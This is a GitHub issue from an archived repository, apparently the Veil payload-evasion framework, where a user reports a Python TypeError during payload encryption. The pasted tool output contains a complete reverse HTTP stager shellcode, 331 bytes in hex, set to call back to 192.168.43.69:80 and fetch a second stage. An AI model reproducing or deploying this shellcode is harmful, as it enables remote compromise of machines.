Skip to content
This repository has been archived by the owner on Jan 10, 2024. It is now read-only.

payload generating issues #468

Open
mike394 opened this issue May 4, 2022 · 0 comments
Open

payload generating issues #468

mike394 opened this issue May 4, 2022 · 0 comments

Comments

@mike394
Copy link

mike394 commented May 4, 2022

[] Payload Name: Reverse HTTP Stager (Stage 1)
[
] IP Address: 192.168.43.69
[] Port: 80
[
] Shellcode Size: 331

\xfc\xe8\x86\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x8b\x4c\x10\x78\xe3\x4a\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x89\x5d\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c\x77\x26\x07\xff\xd5\x31\xdb\x53\x53\x53\x53\x53\x68\x3a\x56\x79\xa7\xff\xd5\x53\x53\x6a\x03\x53\x53\x68\x50\x00\x00\x00\xeb\x3a\x50\x68\x57\x89\x9f\xc6\xff\xd5\x53\x68\x00\x02\x60\x84\x53\x53\x53\xeb\x29\x53\x50\x68\xeb\x55\x2e\x3b\xff\xd5\x96\x6a\x10\x5f\x53\x53\x53\x53\x56\x68\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x75\x18\x4f\x75\xed\x68\xf0\xb5\xa2\x56\xff\xd5\xeb\x42\xe8\xd2\xff\xff\xff\x2f\x4c\x69\x70\x37\x00\x00\x6a\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00\x53\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xbf\x8b\x07\x01\xc3\x85\xc0\x75\xe5\x58\xc3\xe8\x7d\xff\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x34\x33\x2e\x36\x39\x00

Half way... Shellcode generated with Veil-Ordnance! Returning to Veil-Evasion.
Traceback (most recent call last):
File "/usr/share/veil/./Veil.py", line 145, in
the_conductor.main_menu()
File "/usr/share/veil/lib/common/orchestra.py", line 127, in main_menu
tool_object.tool_main_menu()
File "/usr/share/veil/tools/evasion/tool.py", line 368, in tool_main_menu
self.use_payload(selected_payload_module)
File "/usr/share/veil/tools/evasion/tool.py", line 400, in use_payload
selected_payload.generate()
File "/usr/share/veil/tools/evasion/payloads/python/shellcode_inject/aes_encrypt.py", line 89, in generate
encoded_ciphertext, encryption_key, iv_value = encryption.aes_encryption(Shellcode)
File "/usr/share/veil/tools/evasion/evasion_common/encryption.py", line 21, in aes_encryption
aes_cipher_object = AES.new(random_aes_key, AES.MODE_CBC, iv)
File "/usr/lib/python3/dist-packages/Cryptodome/Cipher/AES.py", line 232, in new
return _create_cipher(sys.modules[name], key, mode, *args, **kwargs)
File "/usr/lib/python3/dist-packages/Cryptodome/Cipher/init.py", line 79, in _create_cipher
return modes[mode](factory, **kwargs)
File "/usr/lib/python3/dist-packages/Cryptodome/Cipher/_mode_cbc.py", line 274, in _create_cbc_cipher
cipher_state = factory._create_base_cipher(kwargs)
File "/usr/lib/python3/dist-packages/Cryptodome/Cipher/AES.py", line 103, in _create_base_cipher
result = start_operation(c_uint8_ptr(key),
File "/usr/lib/python3/dist-packages/Cryptodome/Util/_raw_api.py", line 143, in c_uint8_ptr
raise TypeError("Object type %s cannot be passed to C code" % type(data))
TypeError: Object type <class 'str'> cannot be passed to C code

Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant